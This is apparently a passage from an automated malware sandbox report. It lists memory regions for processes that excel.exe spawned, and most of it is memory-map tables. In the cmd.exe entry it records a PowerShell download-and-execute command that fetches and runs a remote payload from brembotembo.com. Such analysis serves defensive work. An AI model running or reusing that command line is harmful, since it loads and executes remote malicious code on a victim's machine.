| sfc_os.dll | 0x7fefa160000 | 0x7fefa16ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| davhlpr.dll | 0x7fefa8d0000 | 0x7fefa8d9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| davclnt.dll | 0x7fefa8e0000 | 0x7fefa8fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-utility-l1-1-0.dll | 0x7fefa980000 | 0x7fefa982fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-environment-l1-1-0.dll | 0x7fefa990000 | 0x7fefa992fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-filesystem-l1-1-0.dll | 0x7fefa9a0000 | 0x7fefa9a2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-time-l1-1-0.dll | 0x7fefa9b0000 | 0x7fefa9b2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-multibyte-l1-1-0.dll | 0x7fefa9c0000 | 0x7fefa9c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-math-l1-1-0.dll | 0x7fefa9d0000 | 0x7fefa9d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-locale-l1-1-0.dll | 0x7fefabe0000 | 0x7fefabe2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-convert-l1-1-0.dll | 0x7fefabf0000 | 0x7fefabf3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| slc.dll | 0x7fefaee0000 | 0x7fefaeeafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| peerdist.dll | 0x7fefb1d0000 | 0x7fefb1fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-stdio-l1-1-0.dll | 0x7fefb320000 | 0x7fefb323fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-heap-l1-1-0.dll | 0x7fefb330000 | 0x7fefb332fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-string-l1-1-0.dll | 0x7fefb340000 | 0x7fefb343fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ucrtbase.dll | 0x7fefb350000 | 0x7fefb441fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-file-l1-2-0.dll | 0x7fefb4c0000 | 0x7fefb4c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x7fefb5d0000 | 0x7fefb5e0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-processthreads-l1-1-1.dll | 0x7fefb5f0000 | 0x7fefb5f2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x7fefb770000 | 0x7fefb787fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefbb50000 | 0x7fefbba5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x7fefbbd0000 | 0x7fefbbd2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-localization-l1-2-0.dll | 0x7fefbbe0000 | 0x7fefbbe2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-file-l2-1-0.dll | 0x7fefbbf0000 | 0x7fefbbf2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7fefbc00000 | 0x7fefbdf3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-timezone-l1-1-0.dll | 0x7fefbe00000 | 0x7fefbe02fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-runtime-l1-1-0.dll | 0x7fefbe10000 | 0x7fefbe13fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| vcruntime140.dll | 0x7fefbe20000 | 0x7fefbe35fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dxgi.dll | 0x7fefbe40000 | 0x7fefbee6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10_1core.dll | 0x7fefbef0000 | 0x7fefbf44fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10_1.dll | 0x7fefbf50000 | 0x7fefbf83fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7fefc100000 | 0x7fefc22bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7fefc500000 | 0x7fefc50bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefd230000 | 0x7fefd23efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winsta.dll | 0x7fefd2e0000 | 0x7fefd31cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7fefd340000 | 0x7fefd34efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x7fefd3e0000 | 0x7fefd3eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wintrust.dll | 0x7fefd3f0000 | 0x7fefd429fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefd430000 | 0x7fefd49afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd540000 | 0x7fefd575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x7fefd580000 | 0x7fefd599fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x7fefd5a0000 | 0x7fefd706fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefd710000 | 0x7fefd912fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefd970000 | 0x7fefd98efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7fefdb10000 | 0x7fefdce6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefdd90000 | 0x7fefdd9dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7fefdda0000 | 0x7fefde76fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefde80000 | 0x7fefdf1efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefdf20000 | 0x7fefe028fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefe030000 | 0x7fefe05dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe060000 | 0x7fefe0c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe0d0000 | 0x7fefe1fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7fefe2a0000 | 0x7fefe37afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefe4c0000 | 0x7fefe588fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe8f0000 | 0x7fefe960fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7fefe970000 | 0x7feff6f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff710000 | 0x7feff710fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffffac000 | 0x7fffffac000 | 0x7fffffadfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd5fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 125 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #3: msosync.exe
0
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\program files\microsoft office\office16\msosync.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office16\MsoSync.exe" |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:00:43, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x544 |
| Parent PID | 0x82c (c:\program files\microsoft office\office16\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
4D8
0x
274
0x
9B8
0x
9D8
0x
9D4
0x
9E0
0x
9F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000040000 | 0x00040000 | 0x00040fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x00160fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00171fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0018ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00191fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x002c0000 | 0x00326fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00431fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00446fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00451fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00461fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x00470fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00480fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x00657fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x01beffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001bf0000 | 0x01bf0000 | 0x01ccefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001d50000 | 0x01d50000 | 0x01dcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e50000 | 0x01e50000 | 0x01e5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x01f4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x0212ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x0229ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000022a0000 | 0x022a0000 | 0x02692fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x026a0000 | 0x0296efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002970000 | 0x02970000 | 0x02d6ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002dc0000 | 0x02dc0000 | 0x02ebffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002f90000 | 0x02f90000 | 0x0308ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000030b0000 | 0x030b0000 | 0x031affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003b20000 | 0x03b20000 | 0x03c1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000371e0000 | 0x371e0000 | 0x371effff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x771d0000 | 0x772c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x772d0000 | 0x773eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x775c0000 | 0x775c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| msosync.exe | 0x13f8a0000 | 0x13f918fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msptls.dll | 0x7fee6e90000 | 0x7fee6ffffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| riched20.dll | 0x7fee8d50000 | 0x7fee8f72fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwrite.dll | 0x7fee9020000 | 0x7fee919dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl.dll | 0x7fee91a0000 | 0x7fee931afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10warp.dll | 0x7fee9320000 | 0x7fee94effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msores.dll | 0x7fee94f0000 | 0x7feee32efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso99lres.dll | 0x7feee330000 | 0x7feeec50fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uires.dll | 0x7feeec60000 | 0x7feeef67fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso.dll | 0x7feeef70000 | 0x7fef024bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso99lwin32client.dll | 0x7fef0250000 | 0x7fef0a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uiwin32client.dll | 0x7fef0a20000 | 0x7fef130afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso30win32client.dll | 0x7fef1310000 | 0x7fef1787fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d11.dll | 0x7fef2ac0000 | 0x7fef2b85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso20win32client.dll | 0x7fef2b90000 | 0x7fef2e93fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d2d1.dll | 0x7fef2fd0000 | 0x7fef30b1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ospintl.dll | 0x7fef7850000 | 0x7fef7854fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sppc.dll | 0x7fef7ac0000 | 0x7fef7ae6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| office.odf | 0x7fef8450000 | 0x7fef8608fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x7fef8610000 | 0x7fef8925fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcp140.dll | 0x7fef8930000 | 0x7fef89cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdiplus.dll | 0x7fef8eb0000 | 0x7fef90c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl30.dll | 0x7fef90d0000 | 0x7fef90defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msimg32.dll | 0x7fef90e0000 | 0x7fef90e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| davhlpr.dll | 0x7fefa8d0000 | 0x7fefa8d9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| davclnt.dll | 0x7fefa8e0000 | 0x7fefa8fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-utility-l1-1-0.dll | 0x7fefa980000 | 0x7fefa982fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-environment-l1-1-0.dll | 0x7fefa990000 | 0x7fefa992fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-filesystem-l1-1-0.dll | 0x7fefa9a0000 | 0x7fefa9a2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-time-l1-1-0.dll | 0x7fefa9b0000 | 0x7fefa9b2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-multibyte-l1-1-0.dll | 0x7fefa9c0000 | 0x7fefa9c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-math-l1-1-0.dll | 0x7fefa9d0000 | 0x7fefa9d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-locale-l1-1-0.dll | 0x7fefabe0000 | 0x7fefabe2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-convert-l1-1-0.dll | 0x7fefabf0000 | 0x7fefabf3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| slc.dll | 0x7fefaee0000 | 0x7fefaeeafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-stdio-l1-1-0.dll | 0x7fefb320000 | 0x7fefb323fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-heap-l1-1-0.dll | 0x7fefb330000 | 0x7fefb332fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-string-l1-1-0.dll | 0x7fefb340000 | 0x7fefb343fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ucrtbase.dll | 0x7fefb350000 | 0x7fefb441fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-file-l1-2-0.dll | 0x7fefb4c0000 | 0x7fefb4c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x7fefb5d0000 | 0x7fefb5e0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-processthreads-l1-1-1.dll | 0x7fefb5f0000 | 0x7fefb5f2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x7fefb770000 | 0x7fefb787fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefbb50000 | 0x7fefbba5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x7fefbbd0000 | 0x7fefbbd2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-localization-l1-2-0.dll | 0x7fefbbe0000 | 0x7fefbbe2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-file-l2-1-0.dll | 0x7fefbbf0000 | 0x7fefbbf2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7fefbc00000 | 0x7fefbdf3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-timezone-l1-1-0.dll | 0x7fefbe00000 | 0x7fefbe02fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-crt-runtime-l1-1-0.dll | 0x7fefbe10000 | 0x7fefbe13fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| vcruntime140.dll | 0x7fefbe20000 | 0x7fefbe35fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dxgi.dll | 0x7fefbe40000 | 0x7fefbee6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10_1core.dll | 0x7fefbef0000 | 0x7fefbf44fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10_1.dll | 0x7fefbf50000 | 0x7fefbf83fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| powrprof.dll | 0x7fefc280000 | 0x7fefc2abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7fefc500000 | 0x7fefc50bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefd230000 | 0x7fefd23efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winsta.dll | 0x7fefd2e0000 | 0x7fefd31cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7fefd340000 | 0x7fefd34efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x7fefd3e0000 | 0x7fefd3eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wintrust.dll | 0x7fefd3f0000 | 0x7fefd429fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefd430000 | 0x7fefd49afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd540000 | 0x7fefd575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x7fefd580000 | 0x7fefd599fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x7fefd5a0000 | 0x7fefd706fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefd710000 | 0x7fefd912fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefd970000 | 0x7fefd98efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7fefdb10000 | 0x7fefdce6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefdd90000 | 0x7fefdd9dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7fefdda0000 | 0x7fefde76fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefde80000 | 0x7fefdf1efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefdf20000 | 0x7fefe028fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefe030000 | 0x7fefe05dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe060000 | 0x7fefe0c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe0d0000 | 0x7fefe1fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7fefe2a0000 | 0x7fefe37afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefe4c0000 | 0x7fefe588fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe8f0000 | 0x7fefe960fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7fefe970000 | 0x7feff6f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff710000 | 0x7feff710fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Process #4: cmd.exe
49
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | CMD.EXE /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://brembotembo.com/1.dat\")) |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:41 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb94 |
| Parent PID | 0x82c (c:\program files\microsoft office\office16\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
